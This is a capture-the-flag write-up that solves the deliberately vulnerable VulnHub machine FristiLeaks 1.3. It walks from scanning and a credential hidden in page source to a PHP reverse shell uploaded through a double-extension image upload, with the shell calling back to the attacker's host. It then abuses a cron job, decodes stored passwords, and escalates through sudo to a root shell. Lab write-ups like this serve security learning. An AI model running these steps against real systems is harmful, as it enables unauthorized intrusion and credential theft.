VulnHub Writeup : FristiLeaks 1.3
Box Stats :
| Box Information | Details |
| Box Name | FristiLeaks 1.3 |
| Series | FristiLeaks |
| Release Date | 14 Dec 2015 |
| Author | Ar0xA |
| Difficulty | Basic |
| Download Link | Link |
Nmap Scan
IP of target vm is `192.168.1.11`, now performing nmap scan
$ nmap -sS -A --top-ports 1000 -oN nmap.txt 192.168.1.11
# Nmap 7.91 scan initiated Wed Nov 17 13:52:14 2021 as: nmap -sS -A --top-ports 1000 -oN nmap.txt 192.168.1.11
Nmap scan report for 192.168.1.11
Host is up (0.0039s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 3.85 ms 192.168.1.11
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 17 13:52:43 2021 -- 1 IP address (1 host up) scanned in 29.36 secondsFindings :
- Open ports : 80
- Robots.txt file :
/cola,sisi,/beer
Now checking web server on port 80
There is a webpage
But there nothing significant info. Now try to access directories from robots.txt, but all shows an image and nothing else.
Nikto Scan
$ nikto -url http://192.168.1.11/ -output nikto.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.11
+ Target Hostname: 192.168.1.11
+ Target Port: 80
+ Start Time: 2021-11-19 08:45:50 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ Server may leak inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 13:45:47 2015
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
+ PHP/5.3.3 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8727 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2021-11-19 08:46:16 (GMT-5) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Directory Bruteforcing
Directory bruteforing using ffuf, i am using common.txt wordlist from Seclists. Also using cewl to add some new words
cewl http://192.168.1.11/ | anew common.txt
Now bruteforcing
$ ffuf -c -u http://192.168.1.11/FUZZ -ac -se -w common.txt -of csv -o ffuf.txt 1 ⨯
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.1.11/FUZZ
:: Wordlist : FUZZ: common.txt
:: Output file : ffuf.txt
:: File format : csv
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 227
:: Filter : Response words: 15
:: Filter : Response lines: 9
________________________________________________
[Status: 200, Size: 703, Words: 66, Lines: 16]
images [Status: 301, Size: 235, Words: 14, Lines: 8]
index.html [Status: 200, Size: 703, Words: 66, Lines: 16]
robots.txt [Status: 200, Size: 62, Words: 5, Lines: 5]
:: Progress: [4653/4653] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
- These is image directory found with some images.
- I also fuzzed
sisi,beerandcolabut nothing much found.
Now at this point i do not found nothing, so i lookup some writeups and i see that there is a directory named fristi ..!!
It has login panel, now try to sqlmap in it.
$ cat header
POST /fristi/checklogin.php HTTP/1.1
Host: 192.168.1.11
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.11/fristi/
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.1.11
Connection: keep-alive
Cookie: PHPSESSID=rjob78365dj1t9njiqa1mk6980
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
myusername=hello&mypassword=man&Submit=Login
$ sqlmap -r header -p myusername Nothing found amd with the field mypassword also nothing found.
Now observing the source code we get a username eeqeepz and down on the page there is an unused base64 string, so lets decode it.
$ echo """iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==""" | base64 -d
PNG
IHDRm4AsRGBgAMA
a pHYsodRIDATx^Qv a
zl&I%KH@f455VI
s~E"Gx#/r9E"Gx#/r9E"Gx#/&T3h#3j
~ݿ~2ZeLZZUW$oy{K}fP9{6XKKL>a%ZD
'*%&RxgյV3]#qpzR\Zb -]յJH9r(I5seGtXq"k6j 6 ŚB5o:å0VKKL>eKZt1n
FnT3Wגߞj g=YxibѢꍗjH-YJH5ӅxD7(
ߠMI6D3
MJH5ӅZl3GYdMo6TrR
/-5ӅJI,i9lѢYD![
otWK}fh}d [T5!Ռuɘ-ӇӋ,C-GR,kj\g}<g.Ռuɘ-V_uZ#|_AӜ'cjƸdЖJ{<7
9C}fP4p]OI5c\2hKGtb#* :RJjƺ$#+o`L*9I:,>U騢"3jƼdȖ#۞j)'zUqF>LZ[Z4LZR}fˑS;|f.-hFEZT_>sda6(.U^n|/ZZ=#;tT_>Trd+?87j-}dRt!#/r9E"Gx#/r9E"Gx#/r9E"Gx#/r9EZ8rqIENDB` and as we can see it shows the header PNG, means its an image file, now store it on a file
echo """iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==""" | base64 -d > image.png
After opening this image file we get a string keKkeKKeKKeKkEkkEk now lets try to login with eeqeepz and password keKkeKKeKKeKkEkkEk
We succeed and it gives up image upload page, uploaded image can be accessed using http://192.168.1.11/fristi/uploads/sample_image.jpg. Now lets try to upload a php backdoor (backend has php, revealed on nikto scan). I am using rshell tool which generates php backdoor file : https://github.com/ajaytekam/rshell
./rshell.py -ip 192.168.1.9 -p 9999 -o image.php
[+] Payload Stored on "image.php"
Now try to upload it
and the error message shows it only accept the png, jpg and gif files. Now lets make copies of backdoor file with names image.jpg, image.jpg.php and image.php.jpq and start a listener and see which file is gets accepted and executed.
- image.jpg gets excepted but not executed. It shows error message
- image.jpg.php did not get accepted
- image.php.jpg gets accepted and executed and gives us a reverse shell on the system
Now opening the backdoor file at http://192.168.1.11/fristi/uploads/image.php.jpg we get a reverse shell
Privilege Escalation
Doing some basic reconnaissance on the system
- Listing all users
bash-4.1$ awk -F: '{print $1}' /etc/passwd
awk -F: '{print $1}' /etc/passwd
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
uucp
operator
games
gopher
ftp
nobody
vcsa
saslauth
postfix
sshd
apache
mysql
vboxadd
eezeepz
admin
fristigod
fristi
Users found : root, eezeepz, admin, fristigod, fristi
- Checking Home Directory
sh-4.1$ cd home
sh-4.1$ ls
admin
eezeepz
fristigodNow checking users
sh-4.1$ cd fristigod
sh: cd: fristigod: Permission denied
sh-4.1$ cd admin
sh: cd: admin: Permission denied
sh-4.1$
In admin and fristigod permission is denied, now checking ezeepz
sh-4.1$ ls -al
ls -al
total 2608
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 .
drwxr-xr-x. 5 root root 4096 Nov 19 2015 ..
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 2015 .Old
-rw-r--r--. 1 eezeepz eezeepz 18 Sep 22 2015 .bash_logout
-rw-r--r--. 1 eezeepz eezeepz 176 Sep 22 2015 .bash_profile
-rw-r--r--. 1 eezeepz eezeepz 124 Sep 22 2015 .bashrc
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 2015 .gnome
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 2015 .settings
-rwxr-xr-x. 1 eezeepz eezeepz 24376 Nov 17 2015 MAKEDEV
-rwxr-xr-x. 1 eezeepz eezeepz 33559 Nov 17 2015 cbq
-rwxr-xr-x. 1 eezeepz eezeepz 6976 Nov 17 2015 cciss_id
-rwxr-xr-x. 1 eezeepz eezeepz 56720 Nov 17 2015 cfdisk
-rwxr-xr-x. 1 eezeepz eezeepz 25072 Nov 17 2015 chcpu
-rwxr-xr-x. 1 eezeepz eezeepz 52936 Nov 17 2015 chgrp
-rwxr-xr-x. 1 eezeepz eezeepz 31800 Nov 17 2015 chkconfig
-rwxr-xr-x. 1 eezeepz eezeepz 48712 Nov 17 2015 chmod
-rwxr-xr-x. 1 eezeepz eezeepz 53640 Nov 17 2015 chown
-rwxr-xr-x. 1 eezeepz eezeepz 44528 Nov 17 2015 clock
-rwxr-xr-x. 1 eezeepz eezeepz 4808 Nov 17 2015 consoletype
-rwxr-xr-x. 1 eezeepz eezeepz 129992 Nov 17 2015 cpio
-rwxr-xr-x. 1 eezeepz eezeepz 38608 Nov 17 2015 cryptsetup
-rwxr-xr-x. 1 eezeepz eezeepz 5344 Nov 17 2015 ctrlaltdel
-rwxr-xr-x. 1 eezeepz eezeepz 41704 Nov 17 2015 cut
-rwxr-xr-x. 1 eezeepz eezeepz 14832 Nov 17 2015 halt
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 2015 hostname
-rwxr-xr-x. 1 eezeepz eezeepz 44528 Nov 17 2015 hwclock
-rwxr-xr-x. 1 eezeepz eezeepz 7920 Nov 17 2015 kbd_mode
-rwxr-xr-x. 1 eezeepz eezeepz 11576 Nov 17 2015 kill
-rwxr-xr-x. 1 eezeepz eezeepz 16472 Nov 17 2015 killall5
-rwxr-xr-x. 1 eezeepz eezeepz 32928 Nov 17 2015 kpartx
-rwxr-xr-x. 1 eezeepz eezeepz 11464 Nov 17 2015 nameif
-rwxr-xr-x. 1 eezeepz eezeepz 171784 Nov 17 2015 nano
-rwxr-xr-x. 1 eezeepz eezeepz 5512 Nov 17 2015 netreport
-rwxr-xr-x. 1 eezeepz eezeepz 123360 Nov 17 2015 netstat
-rwxr-xr-x. 1 eezeepz eezeepz 13892 Nov 17 2015 new-kernel-pkg
-rwxr-xr-x. 1 eezeepz eezeepz 25208 Nov 17 2015 nice
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 2015 nisdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 4736 Nov 17 2015 nologin
-r--r--r--. 1 eezeepz eezeepz 514 Nov 18 2015 notes.txt
-rwxr-xr-x. 1 eezeepz eezeepz 390616 Nov 17 2015 tar
-rwxr-xr-x. 1 eezeepz eezeepz 11352 Nov 17 2015 taskset
-rwxr-xr-x. 1 eezeepz eezeepz 249000 Nov 17 2015 tc
-rwxr-xr-x. 1 eezeepz eezeepz 51536 Nov 17 2015 telinit
-rwxr-xr-x. 1 eezeepz eezeepz 47928 Nov 17 2015 touch
-rwxr-xr-x. 1 eezeepz eezeepz 11440 Nov 17 2015 tracepath
-rwxr-xr-x. 1 eezeepz eezeepz 12304 Nov 17 2015 tracepath6
-rwxr-xr-x. 1 eezeepz eezeepz 21112 Nov 17 2015 true
-rwxr-xr-x. 1 eezeepz eezeepz 35608 Nov 17 2015 tune2fs
-rwxr-xr-x. 1 eezeepz eezeepz 15410 Nov 17 2015 weak-modules
-rwxr-xr-x. 1 eezeepz eezeepz 12216 Nov 17 2015 wipefs
-rwxr-xr-x. 1 eezeepz eezeepz 504400 Nov 17 2015 xfs_repair
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 2015 ypdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 62 Nov 17 2015 zcat
-rwxr-xr-x. 1 eezeepz eezeepz 47520 Nov 17 2015 zic
sh-4.1$ There is an interesting file named notes.txt
ash-4.1$ cat notes.txt
cat notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/\* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- JerryIt means we can run the above given command by setting a cron file in as /tmp/runthis which is run by user admin and the command output is stored on /tmp/cronresult file, the runnable commands are chmod, df, cat, echo, ps, grep and egrep. So basically we can give access to admin home folder using /home/admin/chmod -R 777 /home/admin.
bash-4.1$ echo '/home/admin/chmod -R 777 /home/admin' > /tmp/runthis
echo '/home/admin/chmod -R 777 /home/admin' > /tmp/runthis
bash-4.1$ cat /tmp/cronresult
executing: /home/admin/chmod -R 777 /home/admin
bash-4.1$ rm /tmp/runthis
rm /tmp/runthis
bash-4.1$
bash-4.1$ cd /home
cd /home
bash-4.1$ ls
ls
admin eezeepz fristigod
bash-4.1$ cd admin
cd admin
bash-4.1$ ls -al
ls -al
total 656
drwxrwxrwx. 2 admin admin 4096 Nov 19 17:08 .
drwxr-xr-x. 5 root root 4096 Nov 19 2015 ..
-rwxrwxrwx 1 admin admin 1117 Nov 19 17:53 .bash_history
-rwxrwxrwx. 1 admin admin 18 Sep 22 2015 .bash_logout
-rwxrwxrwx. 1 admin admin 176 Sep 22 2015 .bash_profile
-rwxrwxrwx. 1 admin admin 124 Sep 22 2015 .bashrc
-rwxrwxrwx 1 admin admin 45224 Nov 18 2015 cat
-rwxrwxrwx 1 admin admin 48712 Nov 18 2015 chmod
-rwxrwxrwx 1 admin admin 737 Nov 18 2015 cronjob.py
-rwxrwxrwx 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rwxrwxrwx 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxrwxrwx 1 admin admin 90544 Nov 18 2015 df
-rwxrwxrwx 1 admin admin 24136 Nov 18 2015 echo
-rwxrwxrwx 1 admin admin 163600 Nov 18 2015 egrep
-rwxrwxrwx 1 admin admin 163600 Nov 18 2015 grep
-rwxrwxrwx 1 admin admin 85304 Nov 18 2015 ps
-rwxrwxrwx 1 admin admin 0 Nov 19 16:49 res
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt
bash-4.1$ There are two files with encrypted data
$ cat cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
bash-4.1$ cat whoisyourgodnow.txt
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITGAnd there is a python script which seems to used as an string encoder
bash-4.1$ cat cryptpass.py
cat cryptpass.py
# Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
bash-4.1$
So at above the encodeString function basically ecode string to base64 then reverse the string and again encode it with rot13 encoding. So to reverse the encoding we need to follow below steps :
- Decode stript to rot13
- Reverse the decoded string
- Again decode to base64
Now you can get the original string : decodeString.py
#!/usr/bin/python3
import base64,codecs,sys
def decode(str):
str1=codecs.decode(str, 'rot13')
print(base64.b64decode(str1[::-1]))
decode(sys.argv[1])
Now decoding the string
$ ./decodeString.py mVGZ3O3omkJLmy2pcuTq
b'thisisalsopw123'
$ ./decodeString.py =RFn0AKnlMHMPIzpyuTI0ITG
b'LetThereBeFristi!'Now we get the password for
admin : thisisalsopw123
fristigod : LetThereBeFristi!
Checking the sudoer programs and users
Use the command sudo -l
bash-4.1$ su admin
su admin
Password: thisisalsopw123
[admin@localhost ~]$ sudo -l
sudo -l
[sudo] password for admin: thisisalsopw123
Sorry, user admin may not run sudo on localhost.admin has not any program. Now checking for fristigod
[admin@localhost ~]$ exit
exit
exit
bash-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!
bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$
There is a program called doCom for user fristi, but fristigod can also run this, so now lets try execute the program
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
Usage: ./program_name terminal_command ...
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
bash-4.1£ id
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
As we can see that we got the root shell. Now search for the flag
ash-4.1£ cd /root
cd /root
bash-4.1£ ls
ls
fristileaks_secrets.txt
bash-4.1£ cat fristileaks_secrets.txt
cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of £fristileaks (twitter) and £vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
bash-4.1£ Thats it, we found the flag…
